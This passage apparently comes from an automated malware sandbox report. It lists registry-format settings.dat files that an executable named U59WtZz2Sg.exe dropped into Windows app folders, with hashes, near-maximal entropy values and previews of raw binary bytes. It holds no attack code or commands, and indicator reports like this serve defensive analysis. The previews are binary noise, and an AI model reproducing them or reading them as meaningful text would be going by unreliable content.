Preview:	regf..K..-...4.4r............W.(......~....lz.....:........ZZh8G..a2h.9......n8..Y{...\....U.5l.m........./..z..1!.\~D}_(Z<......M.O..O...Se.d..~.w.U.3l1.%[.Z7-...Gj]...}..5....`.M.\.`.o._..........q..\._8KR....Q...\|+.7.WH.MC{...!X.P.....mD.uPNX...p.....=Y....o.#...Hb....3...]^....r..^_D...pOA..`o...Fn......;.g.....B.{.uK..-u...b.qA6..M5e`5-...R9P...4o.%.....Z..gy.!......#..<...8X.S..>.....4..&.>7C.."..)......&..]x.r.y.F..\${.....K.=.Q.\%.3$6.(\|.p.`.2.G.....p...r8:]t.FD.....C~t.......y..>.W.](.,=S.F.o._.....Xv.........._i..`9./G~.&..rasx....}..........b!..[..6....5...b..''o.LX.J..w.y.+&a5.Ji....;.%.+}.1Kr..U9.....C&.4....:..(d...{.?tb.vv'Q..R.qn...jp..i.....a.......<......;o...WL.7..[Q+.gQ...P.n....j...n..ar.....]U.3.x.....\.....?....f.Dti!mm...{...R..]..U7.'@.U.X.n..R&.wV.q....9ai..._.y(....P.\|}..V.m...y=xM..].....\....[>.......5..~..+...7.....^.x...........>.r2T..1Y....].@K.......e(..Q..#....X...jm.... ......qKT(.".F.s...FZ..C^.`.<G......

C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCalculator_8wekyb3d8bbwe\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.980062347164076
Encrypted:	false
SSDEEP:	192:aWKuXfClhlsm1COk1CAGnp71lWfhZYe/ce0OY24bymc4OddvNAy:xKu6/1CtEPnpLctRz48
MD5:	39D12E6FE48AD3DF2789EB0EEDB70B11
SHA1:	5913236C5C1E8D6BCAE186CA867A5E50A3A6DFDD
SHA-256:	D511297E3DDC72C6ECA242B94049298751A9F4BA306F1D8BCF32DF3815BAB609
SHA-512:	77048A1445ED7785DB80EAF438A7A9CFDB0B6F0F534817483660E59C6D8E20989B5D42666088F02732EC30EB12441D2589BA3A2170A7F5644668D97A292809F1
Malicious:	false
Reputation:	unknown
Preview:	regf....9......f..c....!....`\......d...j.A\|;.u.&.{:.\|.e8,....IpqvIA.O.A>.7\.,.5.n.L...!.5..n..4j.6..8W......UV.o9..-.!......).jY..S.SJHo.2....h..b,Bq..AY...\...hY.....T+u.Nd.o5.........k.;.[L.O..Q.y.pK..%.y.3...CuF....u.........../.O..........8.5hO...?....p]....c[q...A...=.Z..2(..o.)n...-j......I.......E..4+.'i...X...4+.`K...." .....d.v(...f.&.G.(.....L6MT..."J.%z.$....7C.....)..I..1.........+..c.q..xh..#P..".tu........6^z..kDx7..e...$..u{.]e.....h..<S{T..n..+g.....H.K............;..Pg.\|(..[..'^.0{.f+..E.........cf..l..NE<....e...=w....TeL..k....%....jK0m.......4..e./............^....Q?8...4...W....Z.P...] ..b.Q.W.......3z&.D/.U...2....O.H...%....x...4.U.......$.......;..,.....T...$5..a.Y. >...m....N..X..!4;9^...6]...PO+I.P.@..#1..]..GK%d..3v..f....G.....;...)...z.l-v<d8.).,..)Dq9.\..5........d...k.(E..7hLG.......=.j..Y.....Q..^....).;~...{...d=...I./-obL@.8;.t..=.....=......yhY...@Jv.{..*.).'&N...@....@..q...)k...~.my..N.]j=..wP4<

C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.977249006060265
Encrypted:	false
SSDEEP:	192:ZvmbwNFQQ7UV+zyPOZlESpuwnltgq43a8tx6jkMkEXbL9z7rI/:ZvGwNPA+z1nESEAlsaMmkMky1z7rI/
MD5:	95E8AA7473DEAB711621B22C1F9C3412
SHA1:	BA196EFF25DD2AF4CA20A4BFE6F42E79FCF3D084
SHA-256:	564EA1C1F26DBBBF7A81083E2510AA386FBE59DB5B912578869E56F552EA0E00
SHA-512:	468ED936011E79FF4D60F13311F16E2042250B036267170DBFA8472109322B3CA3C23B98FC158872CFD5B09F9C93978EB5B345D5A2FF13186A92A1AEAFF99FE3
Malicious:	false
Reputation:	unknown
Preview:	regf.Zhd8..a...3<q...W..r.7VN....H..v.sz.. N.i.t.Al.x....;.h.S...=..#........gW..)..)...#.l/D....8...K.QZ.U...5.2i.V.!..=..l.QF.....v2xr..6..F.....$P..`.....A....}..M9.m.iz..1K.........9.y.H-.`.M.&\|..[.]^.D....O.^.!.dp.;?$.r.?..Q..?...^}...@.u....%.E5....9....RV._X!....m.R1.:.\9(c..R...B.....I{..G..o..:...Jk..!....B.....r....<..*@....F...<L...8M...&.1..[n.L..%g`...t.U6....h.7_:O...F....x.b..^^......+J.....!.....z..kMtZZ.....P..8......_.A..]..L.@g=..M....f.o......r..).oZ.f\|......&..D. ...+6x^.M....SK .u....^....M&.M.I.0M.u...........k.Q..c(z.....A.P..j O...kGS'4...E..s..f.."2..'C.0.$.t.....GtoM.'........0....H.$......K..I>... ..)..UO.6i....A+l......K/H..T.</m..\<p.&c\|.%.?.Z..&+v.1..l.XK.P....n.W4..I&.N..e.j.K..&.8.%..x.R..T.6.O. .`xO.....R.....=N.~..........Tp6...%.e9....Jhmc..}.\|0.... /..z..`_G..4.F.....ap._.=3..i.GO@...p\..Q1.1.....O.&.mnha287.K.G..I.j.2s.0...b..5^.h.7.Z.9I...5...n.Wd.Q.`....P..-z\|....#..I{.;._..HEzO...$........!)5..Wi...

C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\Settings\settings.dat.LOG1

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.979347752238097
Encrypted:	false
SSDEEP:	192:ejzNJN0dQcJrRoe5RnkXYn0Zfzg9bgZ+oq1L/HaOcJ+Z:ey97Rnk00xg98ZGd/6p+Z
MD5:	4598039847EE36795299D3278152FFC1
SHA1:	E2DD65BE14E9C781E1980C9B1DAF4611960F45B4
SHA-256:	274DE5DDDB62ABF49F13060F5F5BC821A4CC960CA0D3529AA9D5250761244815
SHA-512:	7E6B8C55E9AB39570A40F1F2A9FD866FBD0B022A723BE0F8816A1021608319F302D96F49DC1FEECD46464FE4079769FBBF4BEAA684C0A811633E2ABBB7505E94
Malicious:	false
Reputation:	unknown
Preview:	regf...........M..D.Hqj~(`...,.........."......\1JT.E..z...Y-/N..\|....#.0$....E.2....X'mu..iB..e.\|..-[\|...U.....FkQqE(.7\|....l..+v...r..S`.2[...Y....e....e..`.....P.fS..+v+.B...k........Q5......$.X.>....`..dp../.GX.d....r.\|.Si$'l(.+..b...ab.k.O.3..Q9...Cd.....V..%...F...;R.(..m.....lS}9.9?..u.Y.N..O..8.2-I....qUz6..=.Zc..X=..f.h..TB.......6Xl..'wO.....8':..B....%\|.%../...:.....Hkj.....U(]'....'....),...D\..jX.FP._%..WuX..M.....O.h."v...s.;....KwB..GM...]EL..&${ZR:.Dh..#..`...\..q^\|[...7.=+...&.#.J..Twh9..O_&~s..{.4.61.;..h..38I,_4...I./.{..m.)......f.....F.6..JK.....C....(S.<...@.ce.,..(A....`\w..L.....z.4.Z..... .....<.,d6t].N?D]%eoQ..g..9U.s.,I..l.4T.C...~.S....B.K"..).Sx.}m.;.....{(7.,........I)..... ^....@9.8........Fv..t.F~..e.%.W..$*.i...?.....F_......B.)....Rwj......-...;....Y..[.i..........$.#T..@.q...Z\|.:. .....Q.Y`..mD./.].wv0....\..!pD.Sy2......o.....W.w..p.&G........4".......;...n......[3.......K"..I.=%]y{o......0+c..r....`.G

C:\Users\user\AppData\Local\Packages\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.979038839491481
Encrypted:	false
SSDEEP:	192:4NMzSsGIYDP7V6hBQ2wDZCQiaiNFVKaVtnJ9YxHOv+w:Hz9GI+jYKDt2NiaVtnfhv+w
MD5:	F43E3A8082B1296FDAB06596855EB048
SHA1:	2CBA8FB1F83E3A9B9F8AA3075EE1D0ACC5574FF7
SHA-256:	760B0C89B0192C5699CB8D50C234CE2F502B1F8CB74DC0D69EB1B029C3B06BCD
SHA-512:	84DCEF029750A546EAEFAE8D64EC3883716873347A70409EA9FADEF455A05CCB3D3D6AA4C99206C9ECC348FD3262D55DE7B818C879964D5DB80FC9B37DC057E6
Malicious:	false
Reputation:	unknown
Preview:	regf.....Y..V.WTXX.K..Ccw....r...>..O]..Y0.1......#f%.n...~...............v.WN.....tCb....U.%[.Q.4g..fDw{{....-.l..n.U....c.....,pEt^(..2.L..3.g.a...v.pb.........Q......\|m..K..l.#..'..j..N?.$.#j.:f..>...~.r.c.j.T3..U8...#]....@......<..i@.5..1\$...q...q..:EY.]...1.>C.YT...S.bo.'..#...Q.....C.{.[}.Yy.iB,]..B...0.Jt.3n3c...5....b.o..(..D.!J...9.pl..6.).\|].d.85...hU.o..o.2.Dd..v.........$.Ck...a..y....yr......&..5.]mM....b..A..{.1...yE..I7lx....a....^x..]K....=......o.]./..T.......}.SN../.D._...w.j...g.D...Q{[.i.Q.X..N&....c........Q?.ZT.VT.....X%P...p..b.-MA..;.g....<..sR.....xc;....2.......o#...$u....k.....o.I..o?M(FbR.....b/.gv.=\..5K\M..ac......E..a.l....\9.5..Hi.........@...u.p.....i#.0....(...ix....7...`..p.9...]..&.$..(...m..\l....(... .w.).{...=..lR.'Z...gDsz..H.Z.f\|....T......eu.... .0...)$....Y....OV^..wVh.m..G.`@.R.7. .U.....'..\|.OR...a.5..2.E......-r$k...W.\..9.+Z...v.'.U..... ....F.&m[..{u5...C&...Y.$...2.H....Ss.X.z....lJ

C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.978352500364524
Encrypted:	false
SSDEEP:	192:TZg9bZFgVjQAxaFwAm31RlV2rvMWbjobuT5D31mw6:9OEM9qR3f2rUWbsbAN1mw6
MD5:	C88C54E52026926B5227B62B1FA474C3
SHA1:	691101DD5405A01B525DC7D8E8C8B4721D883C02
SHA-256:	7EDC4EF12A74AC76E353D7C5A5BB4A025FA56FB17D2B41194B94788991E943E7
SHA-512:	7F7AE08A574FF78AB8B919AED05B8265D41D07923875502A56B78DBF0CD3B5257E5187BAEE44E1BF6C6D7EFA585D407B94010BC24923E69742FB9A42546D01BF
Malicious:	false
Reputation:	unknown
Preview:	regf..T.]CX.ts.U............$w.p.. !...^.4`.Y.qd.H.95..,.+A.rg(.L.gx/.v.V..._.-i.=.b..y.Z.4..#.8.Quy2...l....}1YM..7..W......o..>m.a..^.)...[.><....+..94e.("...OQ.+..>Sc(..cp..k.../..Br.x.7d......t+.e.39.F.ZW..s.2...b.g.W4..z VS._.SP.....w....A.c.Z...$...!.a.&......^.9......Q..r. ....p...v.k..X=;.'..]...=.)Mf_..sr.3.oN..B......).U.Xk.R.......?F.......U..../.y....K.I!].......e...-..)HB..e.q.A.gy..:6;...........{...............-.3y-....1i...f..HY.............h.#?...zqC.MK.z...!.3.L!..s...%.jT...........%.<.8....7...i.z.Q.....z+..k......7.....s...s.O.....8b-.@\..,.~R._c..H...4....7u......h&...2......s..99.1.>R".n...8w..@..}....H:.0".....vgm..o...C.os,6...L...<...5.U....i.O.........1g..K%.q.......=W.O..,.K{..v...0q....R.........$.."...y.>-RS......5..}.3SVD....;..z..i. .-S...xGr..a...W....kn...m.J.....z........b...G...JT7...e.....(..M.=NJ..RI........GW.....s....M).}2.......D.\|.z4.A...A...d....&@t..W.G..#.Q...uT....u.......M..i.Z.^..\'...

C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.978005993683504
Encrypted:	false
SSDEEP:	192:itjPu7MQqTiHVx+ruqXFTJ0GMbMFQTUSG9Cx9qpxkZt1tXAMZUPaw:AjPu7MQqTif/qqbxTSrpxkZtj30v
MD5:	195473D9E1888876B2227F0A991BA2BD
SHA1:	9760FDD2D8773BB1C2763B5F53E97B01E9EEBDD9
SHA-256:	B5411816A1F4408BA43DECC3E27EE5AECE7CCB5089F3B624F417E21B0473C7DE
SHA-512:	35990B2214E37210687152730972A3881EDC17C7F7CC05CF2B4DF508BECA0E7DB9DBB374AA2DD0CD03A4E846CF34CF65045E2B2687F3791503D0182D74AB61C3
Malicious:	false
Reputation:	unknown
Preview:	regf.t...Q.A...].eL.'9r..r......'.$k..Y..i....u..n4. -..0......$..1.F ...>.W....r9.+..[._oT.........T..9~.ec..-..<Co.....P.M.[..fX.....Q3....ny.28G,..'w..`.....-.-^...{..`H..(;G..?..)w..WH.hm.t'.&...j.....?.M3.../g...l....,.......z..R.<..r).p.a..C..A.p..`5v....p..g.th0/SV..U.......&...]{.8..aw.9.>..\E7.q..,..N.8"..hb^`-.......7.q y.....~.....qq_c@.1.}.<..-.......OB.V..&s\.{.R.s.......:mq...%.."....4[......f.p.XHp,..d.zf...........'G.[.o3.mf..\...k,p.C.].X.#...O..1...jC..Q..g0........j....F.Q.O..r..?EA.~.W`.Y.....).H.1....`........i.3k....5.....Fsc.r.7~.....C././S.7Rx.Ig.c...NY...(....fAG[.,R.."............[~S..WM\...0....t.o$.\|...G...e..BB LY_I/. ....d.R.......fr.[p.?..m....@:)j...C[.D?.$..f%.O.w...c%.......H{..C.r.At&q!0{\..^.......s.dg..T..Zo.....,..;.d.'.\|..0......._H......OD.U.Q..d..*94.m..&.2.M..W..\W..&.\.8......+ZbY0.,..>.@(G.....9X.."E. ...R..L...B.....{.s..L...zO...W"...t...}.f.9'...E........Y....a.R...a.J2M'b..qn.....BG.NV<L

C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.980040884037454
Encrypted:	false
SSDEEP:	192:E6Or32BEdMLx+i9BY2un/V0AwEIpPeHDdFKz/HIzt:VxhL0iGn/yAw9PeHD7M/HIzt
MD5:	B2410BF93294F08D62FA47478D804DA3
SHA1:	19230D489F1695BA25050686511106AD97EAFD60
SHA-256:	63D7DC2CFB443FD721D8A4FC9A445BF5211608E77A59E7D9F15A42B396526A37
SHA-512:	715778876E42B5B867B54ED7E5EC7AA54BAC12D2F488E72FA2FF6070C7863C7192AD997E93E1643C7632B959470523B65B35CC92E7D077D63722E3B74BABC03D
Malicious:	false
Reputation:	unknown
Preview:	regf.w...."<m'.{..%;...D.B....(7..u..:y.d.......}.:..;...T.j1!._.:..#........]~...].m..?Q.o9.d..@..J.9e..."C..jV...........,9..H.n...F#E.........Gg.A']7......E....R.C.........>..`..P.........G...M6..@..-X7......IJ^L.&0..6..qn...o.X..r..O=..........Tt.6...........V&.BJ...]mS.h.s..K.e...T...9T'+..f).......:H4.&.j?..vZ...mk..%Z.!...........(.`.S...I..>..v.EV.a..0Ia.@...i ..I.1..\.5.=.0...l....52..'.r.......;....[...9...2..l.]~..... MT6Z.,d.S....y!.U.F:`q.Z."..5.R.7....u..I....K.p.CS......... ..Y5.....Y.O...n...\|id......&\|.1...7.^M.XE....;.../{.g1.....J;Gf..Vb...v?MMo_.....p..Y....Y.7..z33.}....@.).6^.D.(.V>w.....r............t.Z.2.. yC...........H+D.x(..R3..)..`..;..r...b-.eD......}.u....Z... S..u....R.]...D...qA.......&J.b\|S.../....Q.....nG"&..Yc..Eo....48jb..JF.P.5.P.w........W.W.MD.q...c..lqFsZ.C.a.;.Q..L..4.Z..m.(~.XY......"..X..K.@.<W.J.j...G..WB?..;..R......E....0..R..Y...\|B.6.5=+_...3..V.qpoNd...?a)G.=.W.6....hQI.H33.G......a..\|G....)1.&.z.Gc

C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat.LOG1

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	16718
Entropy (8bit):	7.987846929979347
Encrypted:	false
SSDEEP:	384:e0rdWUY5FVhIqLcbk0BydxG7R6qIJ/qqHehzQGfXaFkfYPaeSETShcT:eqWUY5FVmqLcbk0BydeoqFnSFxX2hk
MD5:	0563E2C11A485FDBB2CE1D67ADCAAC99
SHA1:	8FC7186A931ADF344DCAADC2D9BF705D81A099EC
SHA-256:	E778706BD6ECF85C07F0D774447EE5F9BCCE93B81BFDF91E16E42A9DE475DBB0
SHA-512:	419A0072662393E960A38503B204819BC8A3A2C9C1FA5ADC1EDC7BF64629E1F534568C4D46D346667A099ED193C3502E466630E954A5BD0E2FEC4DDF6CB8EDDC
Malicious:	false
Reputation:	unknown
Preview:	regf... )t.m.f9..^s.>..Z..s.x@......y..D7....Gex..+..M..@LH(..@..e`.8U..>.,..'.:....R&v.....&F.....]`BDf....>aD..+......w.$.o..1..\f0.....N................Y..Q...B.FYVV.8..~K...._..V......).F....'Q @.!..(..}'...T..<..+,...N...4...Xl.7Y;.HFyU.....nRX]...>...rE._Hh...,..<..DY....j....9....]....S51....dL7......Q.F..s.j..b....h...T.....?.g)..)9-V.Vi..~RUN..O.W........Yo.0sB.H..O..@..O..6.n5 ...sXx..E.!.11.l'...?. Y^..e,.0f .k.,G......@T:T?.x..6....o. .X<........~{..a.B~{I...!3....z..d..l9...B(.'...XWx...'..(.a....4...Z....p........q.B....{.a.E...#C8.U.K:......;<.Kt.2....!.a....K.x....yjl.u.....\|......%...6_.?........_......E.....(.T..y..).%]8}\...YR.-.q.VF..!....Z%.6x.'!.'....x.UC..N......T...s].....y.f._.}.d1.,.Cj..r-x;eYG<.=d(..m4h.p.p..^..&NY.+..%.V.....!,.%..Ka....6.;.5..a....z....e.U.e..:....n......68w..}2.6....d.]....%z@I.8G.Wb..5.....8l..j.."..S(0]...-l$^..B.\|-g.{C.[c.R.C.:EP.......eYq7.....r...Rb+N....\7.@.A..(....p.[....

C:\Users\user\AppData\Local\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.980427809869788
Encrypted:	false
SSDEEP:	192:y6WbPclEQ45k+HIRXbYcZMUjW31Er4PbNAp8WQdIsyx/Cp:QP9Q4S+H84Er4PyGbIDMp
MD5:	4C980CB071055A75D2DD7C190A683C1C
SHA1:	134A46F994417601D6E4FBF48BD28F914E891BC6
SHA-256:	2D0ECACCBD8A84B1A540F6B8893205179EE587CFEA3106A7AD1196F48E6274AE
SHA-512:	4500C5015805ABA2A8329C5010ABA58F9DE8DE567DB9DC4992742FF6EDAC496B48A74C91AF5E30F60F6BB803D6E80E937653A5B2D73034072382A38D6A6D9793
Malicious:	false
Reputation:	unknown
Preview:	regf...d\|....`.:...g&0.1..V,..>.H5...Dg.Jh..Hb..(...`2.......X].y.%.yZ.r[\|M....aRCI.)?S.&t <.6..\A-...h5}.....4./d!..j.z....JbH..2q.....C...b.......}N.Q..z......e.}.@.vx..6.h.,.D.^5..p..y6.Z.x...FM..g......_I.....2.t.V).pb..-.....j..^.u..k..9.....xs.O..>V..w.....lW.E\...}.<...g?.=..F.9..}O.!..........X....-..c.......L..iJ.>..4.<.......e..6}s..&..i3X..j3R7..TB....0a.. ...\_...N.t....#0.@.P....R;t.....kj.{4..U.6..y.^.../....Q.1t..FM.M9.....O>. v....].wh.9~!..F........]x.....'x.,.$[_...... ....ZA....#!..c..dA..5.M.zxx\|.+..q.:.$.tm........{...C..].@..^^0..-...m....(..>.....~...i.&...!^6~%.-..i.tx.H..k!\.U.8I.8..mh..f/......(..,....J..1..\N...1.....p\W.n..8......%...#..e.!..9.....+..;..YT...,..2Y...j2.-...(7..%4..(...5.ri.`QX.1...i...Phj..-..t.{.X.(..$Vse$x.:S..EX...)>..i.. r.. ..J.......N5..L.k.0.........-,.@.U#.`.:..z......XW.C,.iv.=...-\..cJv..h]...~2........>...MT........$..^...........@...d...........l.C.f..u..&a.....<..n..`EB."x7....1

C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.978914726426402
Encrypted:	false
SSDEEP:	192:38O9udFPCroFzlDz0O2F0+FdeH4HMMHoEweTK/B6ltQxNYv3nc:38Cu6roFyiKdeHlMfQxKnc
MD5:	070B5DC387D5E1DB018C15E846C644F0
SHA1:	C227EBDF8D7990C405F15080D75760EE81FA402D
SHA-256:	C25C7939B376B5A498DE9AA69D893DA4D87A74A8E8259562927176B2FB367CBD
SHA-512:	52CDB8389E7F1D49A32C2D36E2AB679681DD94D4646EEB4DAD9139B06FF7F79A8D9131C9C0321E5D90A32E691275AE7B5BA6528E9F0C07A3352B1654011E8B9E
Malicious:	false
Reputation:	unknown
Preview:	regf...]!:Y.........s...#........YV2\|..d<..b....e..V.....l8:w.SX.R7..7.!.`..h.Z).}+..)..S.$( ....AK...m\|...,qC..3.(..Dv.o ....>\..YC..j..j%F.u.L..}......Ax..R.Pw...L....N].W.].R...P1...$.4...8...}.Zi)...z.....N.M....[._.v...u...Ap_3....A.w..7{.TmG.<1.#..{...kv..M/_..A../......8].2..yN ...X...m.6..U..4..3.q..s.8.....d3.......{. Q.....y....-.V.!.c<g.W..5..d8E.0p..k@t....Q.g....R..7!......g....$u...h.z.p.F..=P.k..x.x..?./....h[W_=mF..R.(.kZqRu..[.NL....u.!.k.../ .x..U....Y...C.@..1...^r.=.JW...?2.H,...J.x.'..\.BD..P.......W`m.....O..+Z.Q.E..h.=b............w..<.A.9..PF....-%...u..}.`...3d...\|..R.<.~x..>....e.-@..i........r......7.....Y....dZ.....'w...~sv....fSG.TJ.U o..O.....F.7..;..T.n...3%"o.,/.IA..X.CX..5.E .....H\..].O..S]..u/....+kX.m. Wu.B.B..r.....V4f=K......C......w.b.i../.W6..Y?!...r..:.1.eq.>..C..*"9.?.O.h..T........N....BP...w.........0%Y.mOyK:...&..D.s.q.yT-.K..c4-HUf6...Z.Wl.,..10..>.c.......)~....+V..X...c.ML..6...!.C98_3..)V....

C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\Settings\settings.dat.LOG1

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.979152848664836
Encrypted:	false
SSDEEP:	192:uoXM+4aoQoUcv0kAm95VZzlf0Ol9dpzG7EKEnabqgUoqn33:uGMvaab8k7hZzh0OrpzG7yndou33
MD5:	1B1C892CC0E137330361555A0207916E
SHA1:	D5B26B12348C2B931AF0B66EC60CC88241EBEA18
SHA-256:	CA01B7688098CDDC2B942C26F30BB28A492B10FC813206099A769477914C4E6F
SHA-512:	33965E54967567408D16F6917146E78E9ACBD5A9178371DBAC29DF1DCE0B2A6F945FB3BDF2B85C762B4EB76BD5304CA49E1B54D043B13372F7DC2150140E5C08
Malicious:	false
Reputation:	unknown
Preview:	regf...]y.R......$$B..w..#o..21..,..^yw..].>.,.X{}....6..i......&_T......kp.....<..A........Hc\|...}.rK}.7.....3.....?=...f&.........H..?.Gr.e,DR\..'L=X....c.....U..Zg._ .]...l.dR@U...=5lY\...T.P.=.-.{..V.o.....=^..}oe..Wf{..:.u.[T.RT.9-x9...7.y..fb.}>......d.....N.L..Di.O.@gT.....b..W...U........6G.L....m..<.&VQH....G9,1.4.Cn..:.+.Q.....G.[z...Q9Q?....k-....m.hm..@...>%...v...cy....R.."x..mL.b....x....tr....G..?q.......r.w.4#."`....aC..r........7,cF..Z?.<V.....S.#.7z).IV.a...y....X..?.l@..=.A...9.U....(.K.V.oyk..[Q....`.gEM...G.....t...0..c....jNx....d..&.GP..E....a..\......?.[q......1...\|<..).wNv..g)...c...j:.8..4....]..y.).......#.Vfl..[.UZ....p(.Kv..`t.W..t.d..../.s..,....C...:Ak.3.n..ndL..........,...C8.Y.C...e./..,...=.Y.il..N....\|9....W=.t..s.z.Mh.?..9..$.ud.3...'.-V.7\|'.:P....N7..`vT.....P'....0.1........&L..6.Eg@....C/....T...O............=...kT..K.k...?M.. .r.H.4M..r......:.u.K..7..]f4:{.-..Gvj./........dp..p6..E...}...

C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.978948735271836
Encrypted:	false
SSDEEP:	192:9SnGsA2NiN5qtaA9MvxOZYFYctrnmsh2Q0f:9ajAAiN57vI6b6Q0f
MD5:	9627D4ACAAC1A9F9E9F1FEE1AF60A9B4
SHA1:	E46471097C210C9556E3FF1B985A9BFA43D873BD
SHA-256:	80EE23E3A5A5B535FA9CA77DE88F1B7BDE853FA8665D0D9CD10C0108AECC87C0
SHA-512:	793BC65121EDF8DBAADB331A5E0279CEFFAAFD34AFC9BE446C4022AC0175F0971710128C1A07F00A335093A07FA4C2770A06F3E639586C3EA155E24980AA72D7
Malicious:	false
Reputation:	unknown
Preview:	regf......k..1...\bY..>...(._..d.<9.z..d.\|.i....b....F-......Y.6yd......2.....J;.u.`.FN...S.....9?...g......\|..AK.....S..Xh.._..S.J...>.k..o6^E.Z..V....W.;.+@....?.v.uD..v..O>...D.UN.g.J.....K.......L$..B..04s.H...L1.%.#.&.Q..qG.'..x.....q.g..@H..%..C.g.\|5.6...9@,..........l4..dg.g..;..;..-...uw..3.....b{.5.#.`_.4...X..x...$..p..$..m.T..1\|.u..e...-=9..^..f.\.vJ.G.GT.c...x.?.0u.9.R.P.......!.%(8y.yV. O..#[AM.H..`!..#P..N=....pow2]iN.)\.=2&.-...5..j........LB..O......x.I+...C..ZK.a......o....}...L.O@....aV_!.w...".6..E.{.R.......B-..eY..>.h..(..T+.%...i.:...yQ./XcN.....B..U...[....`.5g]._...<.Nxa.....F..2....tR.^.M....t.b.v..?fx.H?..R.....Q....G!UK....c)..pP?.B5<..B.Z..\K...M..n...N...-.]eq.q...SoA.x..Q.(..f..)......RF.).[xX...af..G(..S...Z.jN... ...Z(..!..h.8.`.(M.....D>52.@.E..k._3.e$.~.b..L..M.W...b.....\|.L.II<7}....f0t.T.....`...n...E..uG._...B..d..!...xI.@5.gr...=_..\D.'..Q%.......pX..!Y.y:Q....Z..".&......g.......G..h!....(.... i..M

C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.979023840975735
Encrypted:	false
SSDEEP:	192:bGnzGbPWiuxCCY+jTLr+HOn4Rwk/ZvnvoRMAvKw5P5C:azGbPWiuxvjTf+u4Rw4+bCk5C
MD5:	F5FC12C14D62C271AF37A73F22B188B4
SHA1:	DA0951DA663B4F7035827D82DB738680742054E1
SHA-256:	AD573A8A49A462DA092DBEFCC095D30EB5E6293D8C221E7217386A1015B11AC3
SHA-512:	DAEDC944DABE1D3C44B762296FF659FD6D11C898E78581D4FAF416BA6E7D18B00E4678C6FDD0AC126629A3481FF8FCCA101D339450A4A4603EC407892D72BDC0
Malicious:	false
Reputation:	unknown
Preview:	regf.....U.............).=.@....".a...Nf.....;.....@...d^7......HW..x...u....+t..#t.(.<.g.R...dT........M...S....K.wC.m.L.)2v..J..E...\.m..Ea...nV.%...../5...S.I..IX.R..zj......^..v.p..gWAqkl...-!.b....75q~GI.6.:..S..O...=;S3;./.N...A;l..\|,......h..[l..C.y..t......Zjp.)23i ..:..w.....p.\...S"w.....F..r.....s$#rN~j-Dn........_....ErW.'..D..O.5R......:.....w..QGWn.......p...eW_.-02.pTE.]...L...rk...n.\..'.....Wxyp..7:...o..C..Ju..Y*,(s..Be.[..'vS9.....o.............~...D.]#..6=.....ZY.Y2..e.B`.!]s.c.c..k3..n...9...... ...s.4cd....`DC.N.h+.D..YSt{..`....-.........%.a...oK....?2q.....o.8_Y.K....v..I..p,9..."....m}..E8...J.c\A<3....{.."...VK{.._.#WD[t...(....a6...@.v.["..2S.hS......V..`.[...?..b!.>....G.L.....~9.OR.&..hm.6.]y...$}.B.:.r...\|7\|...6c#.].W..h^@......a.S..D.Q%)m:.n..@..u..Q../.....J.6...1...~T...}.e..`...,.3.<.......;....-....I.[.l.....x...I../t.`.....^..pz...........<.....9s...1N...(....c...l$.%TJ....i....h.. ...(.g

C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings\settings.dat

Download File

